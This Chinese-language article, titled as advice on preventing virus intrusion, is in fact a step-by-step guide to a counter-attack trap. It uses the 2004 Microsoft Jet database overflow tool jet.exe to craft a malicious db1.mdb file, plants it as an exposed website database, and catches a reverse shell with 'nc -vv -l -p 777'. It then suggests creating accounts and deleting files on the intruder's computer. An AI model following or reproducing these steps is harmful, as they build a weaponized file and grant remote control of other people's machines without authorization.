教你如何防止病毒入侵

ya0831

　　反击原理
　　微软在2004年时曾公布过一个Windows漏洞，这个漏洞的全称为“Microsoft Jet数据库引擎中的漏洞可能允许代码执行”，受影响的系统几乎包含微软的全系列操作系统版本。入侵者可以通过这个漏洞构造恶意的数据库文件，当没有修补过漏洞的用户打开这个恶意的数据库文件时,将会执行黑客事先设置的任意代码。反过来思考，如果我们将这个漏洞利用起来，把构造好的恶意数据库文件设置为网站的数据库，故意暴露给黑客，这样当他们下载了数据库并打开时，反而成了我们的肉鸡。
　　借漏洞工具设下陷阱
　　利用这个漏洞我们要借助该漏洞的溢出程序jet.exe。运行下载jet.exe，解压到某个位置，例如“c:\”，然后点“开始→运行”，输入“cmd”运行“命令提示符”。在“命令提示符”中运行jet.exe。
　　工具的利用方法有4种：0表示在本地测试漏洞；1表示利用反向连接利用漏洞；2的功能类似“下载者”，被溢出的主机主动从指定的网址处下载可执行文件并运行，对穿透防火墙很有用；3表示从本地下载可执行文件并运行。这里我们用第2种功能来进行测试。
　　监听本地端口
　　使用第2种方法，我们要监听一个本地端口。当黑客的主机溢出后会将一个Shell发送到我们监听的端口上。
　　在“命令提示符”中运行黑客的“瑞士军刀”nc，输入如下命令“nc -vv -l -p 777”，回车后会显示“listening on [any] 777 ...”。这样就成功开始监听本机的777端口了。
　　构造恶意数据库文件
　　运行“命令提示符”，输入命令“ipconfig”，查看本机IP，假设这里为60.176.*.*。在“命令提示符”中运行jet.exe，输入命令“jet 2 60.176. *.* 777”，如果显示“Malformed db1.mdb file created. Now open with MSAccess.”，则表示命令执行成功。在同目录下会生成db1.mdb文件，这就是我们所需要的“恶意”数据库文件了。
　　提示：很多使用ADSL上网的用户输入命令“ipconfig”后会出现两个IP地址，其中一个IP地址显示“192.168.0.1”。这个IP地址其实是内网的IP地址，属于一个保留的IP地址，外网访问不了这个地址，因此我们在测试时需要使用类似上文中的IP地址。
　　故意暴露数据库路径
　　接下来的工作就是等待倒霉的入侵者来下载我们的数据库并运行了。当“恶意”数据库被打开时，对于入侵者来说，就等于打开了一个潘多拉盒子。返回查看nc监听的窗口，可以发现监听中的窗口已经有了反映，按一下“Enter”键，即可得到一个来自入侵者主机的Shell。
　　由于对这个漏洞溢出后，我们默认得到的是最高权限，因此我们可以在入侵者的主机上建立账户，修改、删除任意文件。给入侵者一个沉痛的教训，让他偷鸡不成蚀把米。当然不能玩得过火，否则我们就是入侵者了。